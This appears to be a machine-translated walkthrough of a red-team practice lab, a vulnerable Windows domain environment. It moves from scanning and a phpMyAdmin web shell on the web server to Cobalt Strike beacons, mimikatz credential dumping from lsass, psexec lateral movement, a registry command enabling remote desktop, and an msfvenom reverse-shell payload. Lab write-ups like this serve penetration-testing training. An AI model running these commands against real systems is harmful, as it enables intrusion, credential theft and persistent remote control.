Article Directory
Preface
The download address of the drone: ATT&CK Red Team evaluates the actual combat shooting range.
Topological map:
The vulnerability shooting range built by simulating the real environment and fully simulating the ATK&CK attack link is constructed to form a complete closed loop. The default password of the virtual machine is hongrisec@2019.
Environment setup
first name | host | passwd | Description |
---|---|---|---|
windos7 | 192.168.93.160/24 192.168.142.128/24 | hongrisec @ 2019 | web server |
win2K2 | 192.168.142.129/24 | hongrisec @ 2020 | Domain member |
windows server 2008 r2 | 192.168.142.130/24 | hongrisec @ 2020 | Domain controller |
time | 192.168.93.129/24 | time | attack |
Test network connectivity
windows7 ping win2k2, windows server 2012,
here win2k2 ping each other Kali
machine and WEB connection,
because win7 opened the firewall, ping can’t work.
Infiltrate the intranet
collect message
Detect the survival of hosts on the same network segment
nmap -sT 192.168.93.160
Probe port
nmap -sT 192.168.68.160
Operating system, version
nmap –T4 –A
Take advantage of available ports
After the previous scan, it is found that port 80 is open. Here we directly visit.
A php probe was found here. The basic information of the good guy is here. Do you want to scan for information collection?
But I took a look and found that there is still no website directory. Here we directly use the tool to scan, the tool used here is dirsearch
./dirsearch.py -u 192.168.93.160 e *
Vulnerability One_Information Disclosure + Weak Password
Vulnerability 2: Stored XSS
A background audit is required to obtain the administrator cookie.
Vulnerability three _ arbitrarily modify files
Ant sword direct connection
Vulnerability four _phpadmin file writing
Through the phpmyadmin getshell reference link,
then the absolute path is exposed here by the probe.
Then directly based on the article above, getshell.
Remote Connection
This was carried out on win7, and did not break into the intranet of win7 at all. Use the Ant Sword terminal to check the open ports, and add users to win7, and then use 3389 to connect to the desktop remotely:
there is no open port here, let's just Baidu.
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
Next, create a user and add the user to the administrator group to get permission.
Turn off the firewall first
Reference article: Intranet penetration learning navigation
Domain information collection
1. What is a domain
A domain is a form of computer network in which all user accounts, computers, printers, and other security subjects are registered in a central database located on one or more central computer clusters called domain controllers. Authentication takes place on the domain controller. Everyone who uses a computer in the domain receives a unique user account, which can then be assigned access to resources in the domain. Starting from Windows Server 2003, Active Directory is the Windows component responsible for maintaining the central database. The concept of a Windows domain is in contrast to the concept of a workgroup, in which each computer maintains its own security principal database.
Kali first starts cs,
starts the server,
starts the client
, selects the listener in windows executable(s) under Attacks->packags, creates a Trojan horse,
generates a txt file, and runs it in the host's powershell.
Successfully online
Determine whether there is a domain
Use ipconfig /all to view the DNS server:
shell ipconfig /all
Find the DNS server name is god.org , check the domain information: net view
shell net view
View main domain information: net view /domain
shell net view /domain
Query the current login domain and user information: net config workstation
can clearly see whether there is a domain.
Use the dump hash module to export the hash value, obtain credentials (access->dump hashs),
use the logonpasswords module, call the built-in CS mimikatz, and export the user plaintext password and hash saved in the lsass.exe process in memory
Lateral movement
The next step is lateral movement, but because the internal network machine cannot directly connect with the external network, this will use win7 as a springboard.
Official website introduction: SMB Beacon uses named pipes to communicate through the parent Beacon. When the two Beacons are linked, the child Beacon gets the task from the parent Beacon and sends it.
Because the linked Beacons use Windows named pipes to communicate, this traffic is encapsulated in the SMB protocol, so the SMB Beacon is relatively concealed, and it may play a miraculous effect when bypassing the firewall.
First create a new listener
and then use the host information and credentials obtained before to log in using the psexec module.
Go online successfully
MSF reverse shell
Reference article: Link to
implant windows backdoor:
>payload:msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
Configure
windows7 execution in msfconsole